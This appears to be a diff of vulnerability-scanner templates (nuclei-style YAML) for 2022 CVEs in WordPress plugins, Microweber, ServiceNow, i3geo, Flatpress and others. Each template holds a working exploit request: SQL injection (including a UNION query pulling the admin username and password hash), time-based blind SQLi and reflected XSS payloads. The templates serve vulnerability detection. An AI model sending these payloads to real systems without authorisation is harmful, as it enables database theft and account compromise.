cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
verified: true
|
||||||
|
publicwww-query: "/wp-content/plugins/ubigeo-peru/"
|
||||||
|
tags: cve,cve2022,wordpress,wpscan,wp-plugin,sqli,ubigeo-peru,unauth
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
action=rt_ubigeo_load_distritos_address&idProv=1%20UNION%20SELECT%201,(SELECT%20user_login%20FROM%20wp_users%20WHERE%20ID%20=%201),(SELECT%20user_pass%20FROM%20wp_users%20WHERE%20ID%20=%201)%20from%20wp_users#
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- 'idProv'
|
||||||
|
- 'idDist'
|
||||||
|
- 'distrito'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,42 @@
|
||||||
|
id: CVE-2022-0899
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Header Footer Code Manager < 1.1.24 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
The Header Footer Code Manager WordPress plugin before 1.1.24 does not escape generated URLs before outputting them back in attributes in an admin page, leading to a Reflected Cross-Site Scripting.
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/1772417a-1abb-4d97-9694-1254840defd1
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-0899
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2022-0899
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2022,wp,wp-plugin,wordpress,xss,authenticated
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /wp-admin/admin.php?page=hfcm-list&'><script>alert(/document.domain/)</script> HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code_2 == 200'
|
||||||
|
- 'contains(content_type_2, "text/html")'
|
||||||
|
- 'contains(body_2, "<script>alert(/document.domain/)</script>")'
|
||||||
|
- 'contains(body_2, "All Snippets")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,36 @@
|
||||||
|
id: CVE-2022-2174
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: microweber 1.2.18 - Cross-site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
Cross-site Scripting (XSS) - Reflected in GitHub repository microweber/microweber prior to 1.2.18.
|
||||||
|
reference:
|
||||||
|
- https://huntr.dev/bounties/ac68e3fc-8cf1-4a62-90ee-95c4b2bad607/
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-2174
|
||||||
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-2174
|
||||||
|
- https://www.tenable.com/cve/CVE-2022-2174
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cwe-id: CWE-79
|
||||||
|
cve-id: CVE-2022-2174
|
||||||
|
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
tags: cve,cve2023,microweber,xss,unauth
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/api/module?type=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&live_edit=true&from_url=test"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 500'
|
||||||
|
- 'contains(body, "<script>alert(document.domain)</script>") && contains(body, "microweber")'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,52 @@
|
||||||
|
id: CVE-2022-25148
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection
|
||||||
|
author: theamanrawat
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the current_page_id parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5.
|
||||||
|
remediation: Update wp-statistics plugin to version 13.1.6, or newer.
|
||||||
|
reference:
|
||||||
|
- https://wordpress.org/plugins/wp-statistics/
|
||||||
|
- https://gist.github.com/Xib3rR4dAr/5dbd58b7f57a5037fe461fba8e696042
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-25148
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2022-25148
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
max-request: 2
|
||||||
|
verified: true
|
||||||
|
google-query: inurl:/wp-content/plugins/wp-statistics
|
||||||
|
tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET / HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
@timeout: 15s
|
||||||
|
GET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1×tamp=11¤t_page_type=home¤t_page_id=sleep(6)&search_query&page_uri=/&user_id=0 HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
host-redirects: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- duration>=6
|
||||||
|
- status_code == 200
|
||||||
|
- contains(header, "application/json")
|
||||||
|
- contains(body, 'Visitor Hit was recorded successfully')
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
name: nonce
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- '_wpnonce=([0-9a-zA-Z]+)'
|
||||||
|
internal: true
|
|
@ -0,0 +1,51 @@
|
||||||
|
id: CVE-2022-25149
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection
|
||||||
|
author: theamanrawat
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the IP parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5.
|
||||||
|
reference:
|
||||||
|
- https://wordpress.org/plugins/wp-statistics/
|
||||||
|
- https://gist.github.com/Xib3rR4dAr/5dbd58b7f57a5037fe461fba8e696042
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-25149
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2022-25149
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
max-request: 2
|
||||||
|
verified: true
|
||||||
|
publicwww-query: "/wp-content/plugins/wp-statistics/"
|
||||||
|
tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET / HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
@timeout: 50s
|
||||||
|
GET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip='-sleep(6)-'&exclusion_match=no&exclusion_reason&ua=Something&track_all=1×tamp=11¤t_page_type=home¤t_page_id=0&search_query&page_uri=/&user_id=0 HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
host-redirects: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- duration>=6
|
||||||
|
- status_code == 200
|
||||||
|
- contains(header, "application/json")
|
||||||
|
- contains(body, 'Visitor Hit was recorded successfully')
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
name: nonce
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- '_wpnonce=([0-9a-zA-Z]+)'
|
||||||
|
internal: true
|
|
@ -0,0 +1,35 @@
|
||||||
|
id: CVE-2022-2535
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: SearchWP Live Ajax Search < 1.6.2 - Unauthenticated Arbitrary Post Title Disclosure
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: Medium
|
||||||
|
description: |
|
||||||
|
The plugin does not ensure that users making. alive search are limited to published posts only, allowing unauthenticated users to make a crafted query disclosing private/draft/pending post titles along with their permalink
|
||||||
|
remediation: Fixed in version 1.6.2
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/0e13c375-044c-4c2e-ab8e-48cb89d90d02
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-2535
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||||
|
cvss-score: 5.3
|
||||||
|
cve-id: CVE-2022-2535
|
||||||
|
cwe-id: CWE-639
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
verified: true
|
||||||
|
publicwww-query: "/wp-content/plugins/searchwp-live-ajax-search/"
|
||||||
|
tags: cve,cve2023,wp,wp-plugin,wordpress,wpscan,searchwp-live-ajax-search
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=draft"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
- 'contains(body, "searchwp-live-search-result")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,45 @@
|
||||||
|
id: CVE-2022-3142
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: NEX-Forms Plugin < 7.9.7 - SQL Injection
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
The NEX-Forms WordPress plugin before 7.9.7 does not properly sanitise and escape user input before using it in SQL statements, leading to SQL injections. The attack can be executed by anyone who is permitted to view the forms statistics chart, by default administrators, however can be configured otherwise via the plugin settings.
|
||||||
|
remediation: Fixed in version 7.9.7
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/8acc0fc6-efe6-4662-b9ac-6342a7823328/
|
||||||
|
- https://www.exploit-db.com/exploits/51042
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-3142
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 8.8
|
||||||
|
cwe-id: CWE-89
|
||||||
|
cpe: cpe:2.3:a:basixonline:nex-forms:*:*:*:*:*:wordpress:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2022,wordpress,sqli,wp-plugin,wp,wpscan,authenticated
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||||
|
|
||||||
|
- |
|
||||||
|
@timeout: 30s
|
||||||
|
GET /wp-admin/admin.php?page=nex-forms-dashboard&form_id=1+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)-- HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'duration>=5'
|
||||||
|
- 'status_code_2 == 200'
|
||||||
|
- 'contains(body_2, "NEX-Forms")'
|
||||||
|
- 'contains(content_type_2, "text/html")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,34 @@
|
||||||
|
id: CVE-2022-3242
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Microweber <1.3.2 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
Code Injection in on search.php?keywords= GitHub repository microweber/microweber prior to 1.3.2.
|
||||||
|
reference:
|
||||||
|
- https://huntr.dev/bounties/3e6b218a-a5a6-40d9-9f7e-5ab0c6214faf/
|
||||||
|
- https://www.tenable.com/cve/CVE-2022-3242
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-3242
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cwe-id: CWE-79
|
||||||
|
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
verified: true
|
||||||
|
tags: xss,cve,cve2023,microweber
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/search.php?keywords=ABC%3Cdiv%20style=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
- 'contains(body, "<script>alert(document.domain)</script>") && contains(tolower(body), "microweber")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,33 @@
|
||||||
|
id: CVE-2022-34093
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via access_token.php.
|
||||||
|
reference:
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-34093
|
||||||
|
- https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt#L44
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2022-34093
|
||||||
|
cwe-id: CWE-79
|
||||||
|
cpe: cpe:2.3:a:i3geo_project:i3geo:7.0.5:*:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2022,i3geo,xss
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/i3geo/pacotes/linkedinoauth/example/access_token.php?=%3Cscript%3Ealert(document.domain)%3C/script%3E"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
- 'contains_all(body, "%3Cscript%3Ealert(document.domain)%3C/script%3E", "Invalid consumer key")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,33 @@
|
||||||
|
id: CVE-2022-34094
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via request_token.php.
|
||||||
|
reference:
|
||||||
|
- https://github.com/edmarmoretti/i3geo/issues/5
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-34093
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2022-34094
|
||||||
|
cwe-id: CWE-79
|
||||||
|
cpe: cpe:2.3:a:i3geo_project:i3geo:7.0.5:*:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2022,i3geo,xss
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/i3geo/pacotes/linkedinoauth/example/request_token.php?=%3Cscript%3Ealert(document.domain)%3C/script%3E"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
- 'contains_all(body, "%3Cscript%3Ealert(document.domain)%3C/script%3E", "Invalid consumer key")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,68 @@
|
||||||
|
id: CVE-2022-39048
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: ServiceNow - Cross-site Scripting
|
||||||
|
author: theamanrawat
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
A XSS vulnerability was identified in the ServiceNow UI page assessment_redirect. To exploit this vulnerability, an attacker would need to persuade an authenticated user to click a maliciously crafted URL. Successful exploitation potentially could be used to conduct various client-side attacks, including, but not limited to, phishing, redirection, theft of CSRF tokens, and use of an authenticated user's browser or session to attack other systems.
|
||||||
|
reference:
|
||||||
|
- https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1221892
|
||||||
|
- https://blog.amanrawat.in/2023/05/05/CVE-2022-39048.html
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-39048
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2022-39048
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
max-request: 3
|
||||||
|
verified: true
|
||||||
|
shodan-query: http.title:"ServiceNow"
|
||||||
|
tags: cve,cve2022,xss,servicenow,authenticated
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /navpage.do HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /login.do HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
sysparm_ck={{csrf}}&user_name={{username}}&user_password={{password}}¬_important=&ni.nolog.user_password=true&ni.noecho.user_name=true&ni.noecho.user_password=true&screensize=1920x1080&sys_action=sysverb_login&sysparm_login_url=welcome.do
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /assessment_redirect.do?sysparm_survey_url=javascript:alert(document.domain)//assessment_take2.do HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body_3
|
||||||
|
words:
|
||||||
|
- 'unwrapped_url = "javascript:alert(document.domain)//assessment_take2.do"'
|
||||||
|
- 'assessment_list.do'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header_3
|
||||||
|
words:
|
||||||
|
- 'text/html'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
part: header_3
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
name: csrf
|
||||||
|
part: body
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- 'name="sysparm_ck" id="sysparm_ck" type="hidden" value="(.*?)"'
|
||||||
|
internal: true
|
|
@ -0,0 +1,40 @@
|
||||||
|
id: CVE-2022-40032
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Simple Task Managing System v1.0 - SQL Injection
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
SQL injection occurs when a web application doesn't properly validate or sanitize user input that is used in SQL queries. Attackers can exploit this by injecting malicious SQL code into the input fields of a web application, tricking the application into executing unintended database queries.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/51273
|
||||||
|
- https://www.sourcecodester.com/php/15624/simple-task-managing-system-php-mysqli-free-source-code.html
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-40032
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2022-40032
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2022,simple-task,stms,sqli
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
@timeout: 15s
|
||||||
|
POST /task/loginValidation.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
login=test'%20AND%20(SELECT%208979%20FROM%20(SELECT(SLEEP(7-(IF(ORD(MID((SELECT%20DISTINCT(IFNULL(CAST(schema_name%20AS%20NCHAR)%2c0x20))%20FROM%20INFORMATION_SCHEMA.SCHEMATA%20LIMIT%200%2c1)%2c12%2c1))%3e48%2c0%2c1)))))jaXJ)--%20HgKq&password=
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'duration>=7'
|
||||||
|
- 'status_code == 302'
|
||||||
|
- 'content_length == 0'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,54 @@
|
||||||
|
id: CVE-2022-40047
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Flatpress < v1.2.1 - Cross Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
Flatpress v1.2.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the page parameter at /flatpress/admin.php.
|
||||||
|
reference:
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-40047
|
||||||
|
- https://github.com/flatpressblog/flatpress/issues/153
|
||||||
|
metadata:
|
||||||
|
max-request: 2
|
||||||
|
verified: true
|
||||||
|
shodan-query: http.html:"flatpress"
|
||||||
|
tags: cve,cve2022,flatpress,authenticated,xss
|
||||||
|
|
||||||
|
variables:
|
||||||
|
randstring: "{{to_lower(rand_base(16))}}"
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstring}}
|
||||||
|
|
||||||
|
------WebKitFormBoundary{{randstring}}
|
||||||
|
Content-Disposition: form-data; name="user"
|
||||||
|
|
||||||
|
{{username}}
|
||||||
|
------WebKitFormBoundary{{randstring}}
|
||||||
|
Content-Disposition: form-data; name="pass"
|
||||||
|
|
||||||
|
{{password}}
|
||||||
|
------WebKitFormBoundary{{randstring}}
|
||||||
|
Content-Disposition: form-data; name="submit"
|
||||||
|
|
||||||
|
Login
|
||||||
|
------WebKitFormBoundary{{randstring}}--
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /admin.php?p=static&action=write&page=%22onfocus%3d%22alert%28document.domain%29%22autofocus%3d%22zr4da HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code_2 == 200'
|
||||||
|
- 'contains(body_2, "flatpress")'
|
||||||
|
- 'contains(content_type_2, "text/html")'
|
||||||
|
- 'contains(body_2, "onfocus=\"alert(document.domain)")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,58 @@
|
||||||
|
id: CVE-2022-4049
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WP User <= 7.0 - Unauthenticated SQLi
|
||||||
|
author: theamanrawat
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
The WP User WordPress plugin through 7.0 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/9b0781e2-ad62-4308-bafc-d45b9a2472be
|
||||||
|
- https://wordpress.org/plugins/wp-user/
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-4049
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2022-4049
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
verified: "true"
|
||||||
|
tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-user,unauth
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET {{path}} HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
action=wpuser_group_action&group_action=x&wpuser_update_setting={{nonce}}&id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))khkM)
|
||||||
|
|
||||||
|
attack: clusterbomb
|
||||||
|
payloads:
|
||||||
|
path:
|
||||||
|
- "/index.php/user/"
|
||||||
|
- "/user"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- duration>=6
|
||||||
|
- status_code == 200
|
||||||
|
- contains(header_2, "text/html")
|
||||||
|
- contains(body_2, 'Invalid Access')
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
name: nonce
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- '"wpuser_update_setting":"([0-9a-zA-Z]+)"'
|
||||||
|
internal: true
|
|
@ -0,0 +1,42 @@
|
||||||
|
id: CVE-2022-4059
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Cryptocurrency Widgets Pack < 2.0 - SQL Injection
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
The plugin does not sanitise and escape some parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
|
||||||
|
remediation: Fixed in version 2.0
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/d94bb664-261a-4f3f-8cc3-a2db8230895d
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-4059
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2022-4059
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
verified: true
|
||||||
|
publicwww-query: "/wp-content/plugins/cryptocurrency-widgets-pack/"
|
||||||
|
tags: cve,cve2022,wp,wp-plugin,wordpress,wpscan,sqli
|
||||||
|
|
||||||
|
http:
|
||||||
|
